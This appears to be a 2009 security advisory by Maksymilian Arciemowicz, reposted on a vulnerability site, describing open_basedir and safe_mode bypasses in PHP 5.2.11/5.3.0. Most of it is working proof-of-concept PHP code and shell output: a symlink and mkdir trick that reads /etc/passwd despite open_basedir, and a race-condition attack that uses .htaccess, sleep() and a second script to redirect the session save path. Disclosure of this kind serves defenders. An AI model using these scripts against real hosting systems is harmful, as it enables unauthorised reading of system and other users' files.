PHP 5.2.12/5.3.1 Multiple Vulnerabilities

2009.11.13
Credit: Maksymilian Arciemowicz
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ] Author: Maksymilian Arciemowicz Date: - - Dis.: 01.10.2009 - - Pub.: 13.11.2009 Risk: Medium Affected Software: - - PHP 5.3.0 - - PHP 5.2.11 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.symlink.php ksymlink ? Creates a symbolic link bool symlink ( string $target , string $link ) - --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities --- The first main problem exist in security model based on symlinks open_basedir. Paths like $target and $link are checked by open_basedir. We can bypass open_basedir, but function symlink() is not affected. Issue has been generated by false security model designed by PHP. example: 127# cat sym.php <?php symlink("/etc/passwd", "./symlink"); ?> 127# php sym.php PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 127# open_basedir will disallow /etc/passwd. Let`s see: 127# ls -la total 8 drwxr-xr-x 2 www www 512 Oct 20 00:33 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 127# pwd /www/test 127# cat kakao.php <?php mkdir("abc"); chdir("abc"); mkdir("etc"); chdir("etc"); mkdir("passwd"); chdir(".."); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); chdir(".."); chdir(".."); chdir(".."); chdir(".."); symlink("abc/abc/abc/abc","tmplink"); symlink("tmplink/../../../etc/passwd", "exploit"); unlink("tmplink"); mkdir("tmplink"); ?> 127# php kakao.php 127# ls -la total 12 drwxr-xr-x 4 www www 512 Oct 20 00:37 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. drwxr-xr-x 4 www www 512 Oct 20 00:37 abc lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 127# cat exploit # passwd # root:*:0:0:god:/root:/bin/csh ... now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd realy exists. So if we want read other file, we need create other structure. example "/usr/pkg/etc/php.ini": mkdir("usr"); chdir("usr"); mkdir("pkg"); chdir("pkg"); mkdir("etc"); chdir("etc"); mkdir("php.ini"); chdir(".."); chdir(".."); chdir(".."); PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist. Very important is removing fake link "tmplink" and we need to create in this same place dir with this same name. unlink("tmplink"); mkdir("tmplink"); This is the main trick here. Because, "tmplink" (dir) are only -1 deep, not -4. Under PHP 5.2.11 we can also bypass safe_mode. However, the security, such as whether to run suphp php with the privileges of users also have their drawbacks. We can use our exploit to show this vulnerability. If httpd allow read link (default), we can create symlink to / (ofcourse if we have access). If we can not read symlink, we can use next PHP flaw "hazard syphon" to read other files. example of php hazard (session) (open_basedir=/www): script0 "/www/test/.htaccess": php_value session.save_path "/www/test/notyetexists" file /www/test/notyetexists doesn`t exist (current) script1 "/www/test/sessrun.php" <?php sleep(60); session_start(); ?> now we have 60 sec to run script2 script2 "/www/test/runin60.php": <?php mkdir("abc"); chdir("abc"); mkdir("tmp"); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); chdir(".."); chdir(".."); chdir(".."); chdir(".."); symlink("abc/abc/abc/abc","tmplink"); symlink("tmplink/../../../tmp", "notyetexists"); unlink("tmplink"); mkdir("tmplink"); ?> Hazard exist in PHP! Plan of action: 0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'. 1. Run script1, where first phase (SAPI) will check privileges to /www/test/notyetexists. But this file or dir, doesn't exists, so open_basedir will return false. 2. Script1 will generate sleep signal with 60sec delay. In this momemnt, we need run Scritp2. This script, will create link /www/test/notyetexists to /tmp or other directories. 3. Script1 after 60sec will run session_start() function, where privileges to /www/test/notyetexists aren't checked in this moment. In result, we can use function sleep() to create fake delay and first issue can help create symlinks. - --- 2. Exploit --- open_basedir bypass: http://securityreason.com/achievement_exploitalert/14 hazard analogy, as in this note - --- 3. Fix --- Fix not avaliable - --- 4. Contact --- Author: Maksymilian Arciemowicz

References:

http://lu2.php.net/manual/en/function.symlink.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top